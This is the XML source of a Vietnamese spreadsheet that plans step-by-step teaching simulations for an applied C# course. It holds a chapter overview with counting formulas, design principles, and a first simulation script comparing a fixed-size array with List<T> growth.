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040" yWindow="0" windowWidth="22040" windowHeight="14840" tabRatio="600" firstSheet="0" activeTab="1" autoFilterDateGrouping="1"/>
  </bookViews>
  <sheets>
    <sheet name="Tong quan" sheetId="1" state="visible" r:id="rId1"/>
    <sheet name="Phan tich" sheetId="2" state="visible" r:id="rId2"/>
    <sheet name="Thu vien hinh" sheetId="3" state="visible" r:id="rId3"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'Phan tich'!$A$1:$U$61</definedName>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1"/>
    </font>
    <font>
      <name val="Arial"/>
      <sz val="10"/>
    </font>
    <font>
      <name val="Arial"/>
      <b val="1"/>
      <sz val="10"/>
    </font>
    <font>
      <name val="Arial"/>
      <b val="1"/>
      <sz val="14"/>
    </font>
    <font>
      <name val="Arial"/>
      <i val="1"/>
      <sz val="10"/>
    </font>
    <font>
      <name val="Arial"/>
      <b val="1"/>
      <color rgb="FF006100"/>
      <sz val="10"/>
    </font>
    <font>
      <name val="Arial"/>
      <family val="2"/>
      <b val="1"/>
      <color rgb="FFFFFFFF"/>
      <sz val="11"/>
    </font>
  </fonts>
  <fills count="7">
    <fill>
      <patternFill/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF1F5E78"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD9F2E3"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFFE0"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFF1CC"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFC6EFCE"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="2">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color rgb="FFC8CCD0"/>
      </left>
      <right style="thin">
        <color rgb="FFC8CCD0"/>
      </right>
      <top style="thin">
        <color rgb="FFC8CCD0"/>
      </top>
      <bottom style="thin">
        <color rgb="FFC8CCD0"/>
      </bottom>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="1">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="23">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" pivotButton="0" quotePrefix="0" xfId="0"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" pivotButton="0" quotePrefix="0" xfId="0"/>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="1" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" pivotButton="0" quotePrefix="0" xfId="0"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" pivotButton="0" quotePrefix="0" xfId="0"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" pivotButton="0" quotePrefix="0" xfId="0"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="0" pivotButton="0" quotePrefix="0" xfId="0"/>
    <xf numFmtId="0" fontId="3" fillId="5" borderId="0" pivotButton="0" quotePrefix="0" xfId="0"/>
    <xf numFmtId="0" fontId="2" fillId="0"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2" borderId="1" pivotButton="0" quotePrefix="0" xfId="0"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="6"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5" fillId="0" borderId="0" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="2" borderId="1"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top" wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="1">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="3">
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFEEEEEE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFFF1CC"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFD9F2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10" defaultColWidth="8.83203125" defaultRowHeight="15"/>
  <cols>
    <col width="56" customWidth="1" style="18" min="1" max="1"/>
    <col width="15" customWidth="1" style="18" min="2" max="7"/>
  </cols>
  <sheetData>
    <row r="1" ht="18" customHeight="1" s="18">
      <c r="A1" s="1" t="inlineStr">
        <is>
          <t>Phân tích hoạt động mô phỏng – Khóa C# Ứng dụng</t>
        </is>
      </c>
    </row>
    <row r="2" ht="30" customHeight="1" s="18">
      <c r="A2" s="19" t="inlineStr">
        <is>
          <t>Danh sách 61 học liệu cần có hoạt động mô phỏng (đã loại các học liệu không cần: lý thuyết, tóm tắt, trùng ý, bài tập nộp, thảo luận, trắc nghiệm).</t>
        </is>
      </c>
    </row>
    <row r="4" ht="30" customHeight="1" s="18">
      <c r="A4" s="2" t="inlineStr">
        <is>
          <t>Chương</t>
        </is>
      </c>
      <c r="B4" s="2" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="C4" s="2" t="inlineStr">
        <is>
          <t>Làm thêm nếu muốn</t>
        </is>
      </c>
      <c r="D4" s="2" t="inlineStr">
        <is>
          <t>Tổng học liệu</t>
        </is>
      </c>
      <c r="E4" s="2" t="inlineStr">
        <is>
          <t>Đã duyệt OK</t>
        </is>
      </c>
      <c r="F4" s="2" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="G4" s="2" t="inlineStr">
        <is>
          <t>Chưa done</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="3" t="inlineStr">
        <is>
          <t>1. Cấu trúc dữ liệu nâng cao: Collections</t>
        </is>
      </c>
      <c r="B5" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A5,'Phan tich'!$F$2:$F$61,"Nên làm")</f>
        <v/>
      </c>
      <c r="C5" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A5,'Phan tich'!$F$2:$F$61,"Làm thêm nếu muốn")</f>
        <v/>
      </c>
      <c r="D5" s="4">
        <f>COUNTIF('Phan tich'!$B$2:$B$61,$A5)</f>
        <v/>
      </c>
      <c r="E5" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A5,'Phan tich'!$T$2:$T$61,"OK")</f>
        <v/>
      </c>
      <c r="F5" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A5,'Phan tich'!$G$2:$G$61,"Done")</f>
        <v/>
      </c>
      <c r="G5" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A5,'Phan tich'!$G$2:$G$61,"Chưa done")</f>
        <v/>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="3" t="inlineStr">
        <is>
          <t>2. Xử lý lỗi và Ngoại lệ (Exception Handling) Cơ bản</t>
        </is>
      </c>
      <c r="B6" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A6,'Phan tich'!$F$2:$F$61,"Nên làm")</f>
        <v/>
      </c>
      <c r="C6" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A6,'Phan tich'!$F$2:$F$61,"Làm thêm nếu muốn")</f>
        <v/>
      </c>
      <c r="D6" s="4">
        <f>COUNTIF('Phan tich'!$B$2:$B$61,$A6)</f>
        <v/>
      </c>
      <c r="E6" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A6,'Phan tich'!$T$2:$T$61,"OK")</f>
        <v/>
      </c>
      <c r="F6" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A6,'Phan tich'!$G$2:$G$61,"Done")</f>
        <v/>
      </c>
      <c r="G6" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A6,'Phan tich'!$G$2:$G$61,"Chưa done")</f>
        <v/>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="3" t="inlineStr">
        <is>
          <t>3. Xử lý lỗi và Ngoại lệ (Exception Handling) Nâng cao</t>
        </is>
      </c>
      <c r="B7" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A7,'Phan tich'!$F$2:$F$61,"Nên làm")</f>
        <v/>
      </c>
      <c r="C7" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A7,'Phan tich'!$F$2:$F$61,"Làm thêm nếu muốn")</f>
        <v/>
      </c>
      <c r="D7" s="4">
        <f>COUNTIF('Phan tich'!$B$2:$B$61,$A7)</f>
        <v/>
      </c>
      <c r="E7" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A7,'Phan tich'!$T$2:$T$61,"OK")</f>
        <v/>
      </c>
      <c r="F7" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A7,'Phan tich'!$G$2:$G$61,"Done")</f>
        <v/>
      </c>
      <c r="G7" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A7,'Phan tich'!$G$2:$G$61,"Chưa done")</f>
        <v/>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="3" t="inlineStr">
        <is>
          <t>4. Đọc và Ghi File Văn bản</t>
        </is>
      </c>
      <c r="B8" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A8,'Phan tich'!$F$2:$F$61,"Nên làm")</f>
        <v/>
      </c>
      <c r="C8" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A8,'Phan tich'!$F$2:$F$61,"Làm thêm nếu muốn")</f>
        <v/>
      </c>
      <c r="D8" s="4">
        <f>COUNTIF('Phan tich'!$B$2:$B$61,$A8)</f>
        <v/>
      </c>
      <c r="E8" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A8,'Phan tich'!$T$2:$T$61,"OK")</f>
        <v/>
      </c>
      <c r="F8" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A8,'Phan tich'!$G$2:$G$61,"Done")</f>
        <v/>
      </c>
      <c r="G8" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A8,'Phan tich'!$G$2:$G$61,"Chưa done")</f>
        <v/>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="3" t="inlineStr">
        <is>
          <t>5. Làm việc với Dữ liệu có Cấu trúc (CSV)</t>
        </is>
      </c>
      <c r="B9" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A9,'Phan tich'!$F$2:$F$61,"Nên làm")</f>
        <v/>
      </c>
      <c r="C9" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A9,'Phan tich'!$F$2:$F$61,"Làm thêm nếu muốn")</f>
        <v/>
      </c>
      <c r="D9" s="4">
        <f>COUNTIF('Phan tich'!$B$2:$B$61,$A9)</f>
        <v/>
      </c>
      <c r="E9" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A9,'Phan tich'!$T$2:$T$61,"OK")</f>
        <v/>
      </c>
      <c r="F9" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A9,'Phan tich'!$G$2:$G$61,"Done")</f>
        <v/>
      </c>
      <c r="G9" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A9,'Phan tich'!$G$2:$G$61,"Chưa done")</f>
        <v/>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="3" t="inlineStr">
        <is>
          <t>6. Lưu trữ Đối tượng với Serialization</t>
        </is>
      </c>
      <c r="B10" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A10,'Phan tich'!$F$2:$F$61,"Nên làm")</f>
        <v/>
      </c>
      <c r="C10" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A10,'Phan tich'!$F$2:$F$61,"Làm thêm nếu muốn")</f>
        <v/>
      </c>
      <c r="D10" s="4">
        <f>COUNTIF('Phan tich'!$B$2:$B$61,$A10)</f>
        <v/>
      </c>
      <c r="E10" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A10,'Phan tich'!$T$2:$T$61,"OK")</f>
        <v/>
      </c>
      <c r="F10" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A10,'Phan tich'!$G$2:$G$61,"Done")</f>
        <v/>
      </c>
      <c r="G10" s="4">
        <f>COUNTIFS('Phan tich'!$B$2:$B$61,$A10,'Phan tich'!$G$2:$G$61,"Chưa done")</f>
        <v/>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>Tổng</t>
        </is>
      </c>
      <c r="B11" s="6">
        <f>SUM(B5:B10)</f>
        <v/>
      </c>
      <c r="C11" s="6">
        <f>SUM(C5:C10)</f>
        <v/>
      </c>
      <c r="D11" s="6">
        <f>SUM(D5:D10)</f>
        <v/>
      </c>
      <c r="E11" s="6">
        <f>SUM(E5:E10)</f>
        <v/>
      </c>
      <c r="F11" s="6">
        <f>SUM(F5:F10)</f>
        <v/>
      </c>
      <c r="G11" s="6">
        <f>SUM(G5:G10)</f>
        <v/>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="7" t="inlineStr">
        <is>
          <t>Cách đọc file</t>
        </is>
      </c>
      <c r="B13" s="17" t="n"/>
    </row>
    <row r="14" ht="30" customHeight="1" s="18">
      <c r="A14" s="8" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="B14" s="17" t="inlineStr">
        <is>
          <t>Bài đọc có quá trình chạy hoặc hiện tượng khó hình dung bằng chữ (dịch chuyển phần tử, luồng exception, bộ đệm tệp, phân tích CSV...).</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="9" t="inlineStr">
        <is>
          <t>Làm thêm nếu muốn</t>
        </is>
      </c>
      <c r="B15" s="17" t="inlineStr">
        <is>
          <t>Có ích nhưng ý chính đã được bài khác hoặc bài đọc truyền tải khá tốt.</t>
        </is>
      </c>
    </row>
    <row r="16" ht="30" customHeight="1" s="18">
      <c r="A16" s="7" t="inlineStr">
        <is>
          <t>Sheet 'Phan tich'</t>
        </is>
      </c>
      <c r="B16" s="17" t="inlineStr">
        <is>
          <t>Mỗi dòng một học liệu. Các cột từ 'Mục tiêu' tới 'Lưu ý kiến thức C#' là bản mô tả chi tiết để viết mô phỏng. Ô vàng cuối dòng để bạn chọn OK / Sửa / Bỏ và ghi ý kiến.</t>
        </is>
      </c>
    </row>
    <row r="17" ht="30" customHeight="1" s="18">
      <c r="A17" s="7" t="inlineStr">
        <is>
          <t>Sheet 'Thu vien hinh'</t>
        </is>
      </c>
      <c r="B17" s="17" t="inlineStr">
        <is>
          <t>22 thành phần hình minh họa dùng chung (mã H01–H22). Mỗi mô phỏng kết hợp khung code quen thuộc với 1–3 thành phần hình để đa dạng và trực quan hơn khóa trước.</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="7" t="n"/>
      <c r="B18" s="17" t="n"/>
    </row>
    <row r="19">
      <c r="A19" s="7" t="inlineStr">
        <is>
          <t>Nguyên tắc thiết kế</t>
        </is>
      </c>
      <c r="B19" s="17" t="n"/>
    </row>
    <row r="20" ht="30" customHeight="1" s="18">
      <c r="A20" s="7" t="inlineStr">
        <is>
          <t>Đơn giản trước</t>
        </is>
      </c>
      <c r="B20" s="17" t="inlineStr">
        <is>
          <t>Mỗi mô phỏng một ý chính, 4–9 bước mỗi tab, chỉ bấm Bước tiếp / Chạy hết / Làm lại. Không quiz, không thử thách. Tab chỉ để đổi tình huống.</t>
        </is>
      </c>
    </row>
    <row r="21" ht="30" customHeight="1" s="18">
      <c r="A21" s="7" t="inlineStr">
        <is>
          <t>Hình minh họa</t>
        </is>
      </c>
      <c r="B21" s="17" t="inlineStr">
        <is>
          <t>Ngoài khung Mã nguồn – Console – Bộ nhớ, thêm khung 'Hình minh họa' vẽ bằng HTML/SVG thuần (không thư viện ngoài). Chuyển động nhẹ 200–300 ms; tắt chuyển động khi người dùng bật prefers-reduced-motion.</t>
        </is>
      </c>
    </row>
    <row r="22" ht="30" customHeight="1" s="18">
      <c r="A22" s="7" t="inlineStr">
        <is>
          <t>Màu sắc thống nhất</t>
        </is>
      </c>
      <c r="B22" s="17" t="inlineStr">
        <is>
          <t>Vàng = đang xét; Xanh lá = thành công/đã xong; Đỏ = lỗi/mất dữ liệu; Xám = bị bỏ qua/không chạy. Có chế độ tối.</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="7" t="inlineStr">
        <is>
          <t>Điện thoại</t>
        </is>
      </c>
      <c r="B23" s="17" t="inlineStr">
        <is>
          <t>Hiển thị tốt ở bề rộng 390px: hai cột xếp chồng, hình tự co, không tràn ngang.</t>
        </is>
      </c>
    </row>
    <row r="24" ht="30" customHeight="1" s="18">
      <c r="A24" s="7" t="inlineStr">
        <is>
          <t>Sự thật kỹ thuật</t>
        </is>
      </c>
      <c r="B24" s="17" t="inlineStr">
        <is>
          <t>Thông điệp lỗi, mã lỗi biên dịch, số byte, kết quả tính toán phải đúng theo .NET hiện đại; tính bằng code thật trong mô phỏng, không bịa.</t>
        </is>
      </c>
    </row>
    <row r="25" ht="30" customHeight="1" s="18">
      <c r="A25" s="7" t="inlineStr">
        <is>
          <t>Lưu ý nội dung lỗi thời</t>
        </is>
      </c>
      <c r="B25" s="17" t="inlineStr">
        <is>
          <t>Chương 6 dùng BinaryFormatter/ISerializable: đã bị loại bỏ trong .NET 9. Mô phỏng không minh họa BinaryFormatter; đề xuất cập nhật học liệu.</t>
        </is>
      </c>
    </row>
    <row r="26" ht="30" customHeight="1" s="18">
      <c r="A26" s="7" t="inlineStr">
        <is>
          <t>Thư mục</t>
        </is>
      </c>
      <c r="B26" s="17" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/&lt;chuong&gt;/&lt;bai-hoc&gt;/&lt;hoc-lieu&gt;/index.html, đẩy lên GitHub Pages như các khóa trước.</t>
        </is>
      </c>
    </row>
  </sheetData>
  <mergeCells count="15">
    <mergeCell ref="B24:G24"/>
    <mergeCell ref="B16:G16"/>
    <mergeCell ref="B20:G20"/>
    <mergeCell ref="B19:G19"/>
    <mergeCell ref="B22:G22"/>
    <mergeCell ref="B14:G14"/>
    <mergeCell ref="B17:G17"/>
    <mergeCell ref="B23:G23"/>
    <mergeCell ref="A2:G2"/>
    <mergeCell ref="B26:G26"/>
    <mergeCell ref="B18:G18"/>
    <mergeCell ref="B13:G13"/>
    <mergeCell ref="B21:G21"/>
    <mergeCell ref="B15:G15"/>
    <mergeCell ref="B25:G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1"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <pane xSplit="4" ySplit="1" topLeftCell="U61" activePane="bottomRight" state="frozen"/>
      <selection pane="topRight" activeCell="A1" sqref="A1"/>
      <selection pane="bottomLeft" activeCell="A1" sqref="A1"/>
      <selection pane="bottomRight" activeCell="V61" sqref="V61"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15"/>
  <cols>
    <col width="5" customWidth="1" style="18" min="1" max="1"/>
    <col width="24" customWidth="1" style="18" min="2" max="2"/>
    <col width="26" customWidth="1" style="18" min="3" max="3"/>
    <col width="32" customWidth="1" style="18" min="4" max="4"/>
    <col width="13" customWidth="1" style="18" min="5" max="6"/>
    <col width="11" customWidth="1" style="18" min="7" max="7"/>
    <col width="34" customWidth="1" style="18" min="8" max="8"/>
    <col width="20" customWidth="1" style="18" min="9" max="9"/>
    <col width="42" customWidth="1" style="18" min="10" max="10"/>
    <col width="12" customWidth="1" style="18" min="11" max="11"/>
    <col width="26" customWidth="1" style="18" min="12" max="12"/>
    <col width="70" customWidth="1" style="18" min="13" max="13"/>
    <col width="26" customWidth="1" style="18" min="14" max="14"/>
    <col width="34" customWidth="1" style="18" min="15" max="15"/>
    <col width="40" customWidth="1" style="18" min="16" max="16"/>
    <col width="36" customWidth="1" style="18" min="17" max="18"/>
    <col width="30" customWidth="1" style="18" min="19" max="19"/>
    <col width="13" customWidth="1" style="18" min="20" max="20"/>
    <col width="24" customWidth="1" style="18" min="21" max="21"/>
    <col width="27.6640625" customWidth="1" style="18" min="22" max="22"/>
  </cols>
  <sheetData>
    <row r="1" ht="32" customHeight="1" s="18">
      <c r="A1" s="2" t="inlineStr">
        <is>
          <t>STT</t>
        </is>
      </c>
      <c r="B1" s="2" t="inlineStr">
        <is>
          <t>Chương (Module)</t>
        </is>
      </c>
      <c r="C1" s="2" t="inlineStr">
        <is>
          <t>Bài học (Lesson)</t>
        </is>
      </c>
      <c r="D1" s="2" t="inlineStr">
        <is>
          <t>Học liệu (Activity)</t>
        </is>
      </c>
      <c r="E1" s="2" t="inlineStr">
        <is>
          <t>Loại học liệu</t>
        </is>
      </c>
      <c r="F1" s="2" t="inlineStr">
        <is>
          <t>Mức đề xuất</t>
        </is>
      </c>
      <c r="G1" s="2" t="inlineStr">
        <is>
          <t>Trạng thái</t>
        </is>
      </c>
      <c r="H1" s="2" t="inlineStr">
        <is>
          <t>Mục tiêu của mô phỏng</t>
        </is>
      </c>
      <c r="I1" s="2" t="inlineStr">
        <is>
          <t>Dạng giao diện</t>
        </is>
      </c>
      <c r="J1" s="2" t="inlineStr">
        <is>
          <t>Hình minh họa</t>
        </is>
      </c>
      <c r="K1" s="2" t="inlineStr">
        <is>
          <t>Thành phần hình (mã)</t>
        </is>
      </c>
      <c r="L1" s="2" t="inlineStr">
        <is>
          <t>Tab / tình huống</t>
        </is>
      </c>
      <c r="M1" s="2" t="inlineStr">
        <is>
          <t>Kịch bản từng bước</t>
        </is>
      </c>
      <c r="N1" s="2" t="inlineStr">
        <is>
          <t>Dữ liệu mẫu</t>
        </is>
      </c>
      <c r="O1" s="2" t="inlineStr">
        <is>
          <t>Điểm chốt (bước cuối)</t>
        </is>
      </c>
      <c r="P1" s="2" t="inlineStr">
        <is>
          <t>Lưu ý kiến thức C#</t>
        </is>
      </c>
      <c r="Q1" s="2" t="inlineStr">
        <is>
          <t>Đường dẫn file (đề xuất)</t>
        </is>
      </c>
      <c r="R1" s="2" t="inlineStr">
        <is>
          <t>Link GitHub Pages (sau khi đẩy)</t>
        </is>
      </c>
      <c r="S1" s="2" t="inlineStr">
        <is>
          <t>Ghi chú / lý do</t>
        </is>
      </c>
      <c r="T1" s="2" t="inlineStr">
        <is>
          <t>Duyệt (OK / Sửa / Bỏ)</t>
        </is>
      </c>
      <c r="U1" s="2" t="inlineStr">
        <is>
          <t>Ý kiến của bạn</t>
        </is>
      </c>
      <c r="V1" s="20" t="inlineStr">
        <is>
          <t>Nội dung cũ</t>
        </is>
      </c>
      <c r="W1" s="20" t="inlineStr">
        <is>
          <t>Nội dung mới</t>
        </is>
      </c>
    </row>
    <row r="2" ht="409.6" customHeight="1" s="18">
      <c r="A2" s="10" t="n">
        <v>1</v>
      </c>
      <c r="B2" s="10" t="inlineStr">
        <is>
          <t>1. Cấu trúc dữ liệu nâng cao: Collections</t>
        </is>
      </c>
      <c r="C2" s="10" t="inlineStr">
        <is>
          <t>Giới thiệu về Collections và List&lt;T&gt; cơ bản</t>
        </is>
      </c>
      <c r="D2" s="10" t="inlineStr">
        <is>
          <t>Giới thiệu Collections trong C#</t>
        </is>
      </c>
      <c r="E2" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F2" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G2" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H2" s="10" t="inlineStr">
        <is>
          <t>Thấy vì sao cần List&lt;T&gt;: mảng có kích thước cố định, còn List&lt;T&gt; tự mở rộng khi thêm phần tử.</t>
        </is>
      </c>
      <c r="I2" s="10" t="inlineStr">
        <is>
          <t>2 cột song song: Mảng int[] | List&lt;int&gt;</t>
        </is>
      </c>
      <c r="J2" s="10" t="inlineStr">
        <is>
          <t>Mỗi cột một dãy ô có chỉ số. Ô dự phòng của List vẽ nét đứt. Khi mảng bị ghi quá giới hạn, ô 'không tồn tại' nháy đỏ. Khi List hết chỗ, hiện hiệu ứng cấp dãy ô mới gấp đôi và chép phần tử sang.</t>
        </is>
      </c>
      <c r="K2" s="10" t="inlineStr">
        <is>
          <t>H01, H03, H22</t>
        </is>
      </c>
      <c r="L2" s="10" t="inlineStr">
        <is>
          <t>1 tab: Thêm phần tử thứ 4 và thứ 5</t>
        </is>
      </c>
      <c r="M2" s="10" t="inlineStr">
        <is>
          <t>Hai cột cùng cần lưu điểm 8, 6, 9. Trái: int[] a = new int[3]. Phải: List&lt;int&gt; l = new List&lt;int&gt;() (Count 0, Capacity 0).
Trái gán a[0..2]. Phải gọi Add 3 lần: Count 1→3, lần Add đầu cấp sẵn 4 chỗ (Capacity 4, ô thứ 4 nét đứt).
Cả hai muốn thêm điểm 7.
Trái: a[3] = 7 → không có ô chỉ số 3, console hiện IndexOutOfRangeException, chương trình dừng.
Phải: l.Add(7) → lấp ô dự phòng, Count 4, Capacity 4.
Phải: l.Add(10) → hết chỗ, List cấp dãy mới 8 ô, chép 4 phần tử sang rồi thêm 10 (Count 5, Capacity 8).
Xong: so sánh hai cột.</t>
        </is>
      </c>
      <c r="N2" s="10" t="inlineStr">
        <is>
          <t>Điểm: 8, 6, 9, 7, 10</t>
        </is>
      </c>
      <c r="O2" s="10" t="inlineStr">
        <is>
          <t>Mảng cố định kích thước khi tạo. List&lt;T&gt; tự lo việc mở rộng, người dùng chỉ cần gọi Add.</t>
        </is>
      </c>
      <c r="P2" s="10" t="inlineStr">
        <is>
          <t>new List&lt;int&gt;() có Capacity 0; lần Add đầu cấp 4, sau đó nhân đôi (chi tiết cài đặt của .NET, chỉ nêu để minh họa). Ghi ngoài mảng ném IndexOutOfRangeException.</t>
        </is>
      </c>
      <c r="Q2" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/gioi-thieu-ve-collections-va-list-t-co-ban/gioi-thieu-collections-trong-c-sharp/index.html</t>
        </is>
      </c>
      <c r="R2" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/gioi-thieu-ve-collections-va-list-t-co-ban/gioi-thieu-collections-trong-c-sharp/</t>
        </is>
      </c>
      <c r="S2" s="10" t="n"/>
      <c r="T2" s="12" t="n"/>
      <c r="U2" s="12" t="n"/>
      <c r="V2" s="21" t="inlineStr">
        <is>
          <t>Trong lập trình C#, việc quản lý và thao tác với các nhóm dữ liệu là một nhiệm vụ cơ bản và thường xuyên. Để làm được điều này một cách hiệu quả, .NET Framework cung cấp một tập hợp các cấu trúc dữ liệu mạnh mẽ được gọi là Collections. Collections không chỉ giúp chúng ta lưu trữ dữ liệu mà còn cung cấp các cơ chế linh hoạt để thêm, xóa, truy cập và sắp xếp chúng.
Collections là gì và Tại sao cần sử dụng chúng?
Một Collection (tập hợp) là một cấu trúc dữ liệu được thiết kế để lưu trữ và quản lý một nhóm các đối tượng. Tưởng tượng bạn có một danh sách các món đồ cần mua, một tập hợp các sinh viên trong lớp, hoặc một bộ sưu tập các bài hát yêu thích. Thay vì khai báo từng biến riêng lẻ cho mỗi món đồ, sinh viên hay bài hát, Collections cho phép bạn nhóm chúng lại thành một đơn vị duy nhất, dễ dàng quản lý hơn.
Chúng ta cần sử dụng Collections vì những lý do sau:
Quản lý nhóm dữ liệu: Collections cung cấp một cách có tổ chức để lưu trữ và truy cập nhiều phần tử cùng một lúc.
Thao tác dữ liệu hiệu quả: Chúng đi kèm với nhiều phương thức tích hợp sẵn để thực hiện các thao tác phổ biến như thêm, xóa, tìm kiếm, sắp xếp các phần tử một cách dễ dàng và hiệu quả.
Linh hoạt và tái sử dụng: Collections được thiết kế để hoạt động với nhiều kiểu dữ liệu khác nhau và có thể được tái sử dụng trong nhiều ngữ cảnh lập trình.
Ưu điểm của Collections so với Mảng truyền thống
Trước khi có Collections, lập trình viên thường sử dụng mảng (Array) để lưu trữ các nhóm dữ liệu. Tuy nhiên, mảng truyền thống trong C# có một số hạn chế đáng kể mà Collections khắc phục được:
Kích thước cố định: Khi bạn khai báo một mảng, bạn phải chỉ định kích thước của nó ngay từ đầu. Sau đó, bạn không thể thay đổi kích thước này. Nếu bạn cần thêm phần tử vượt quá giới hạn hoặc xóa nhiều phần tử khiến mảng bị trống, bạn sẽ phải tạo một mảng mới và sao chép tất cả các phần tử, điều này rất tốn kém và không hiệu quả.
int[] mangSoNguyen = new int[5]; // Kích thước cố định là 5
// Không thể thêm phần tử thứ 6 mà không tạo mảng mới
Ngược lại, hầu hết các Collections đều có kích thước động. Chúng tự động điều chỉnh khả năng lưu trữ khi bạn thêm hoặc xóa phần tử, giúp bạn không cần lo lắng về việc quản lý kích thước thủ công.
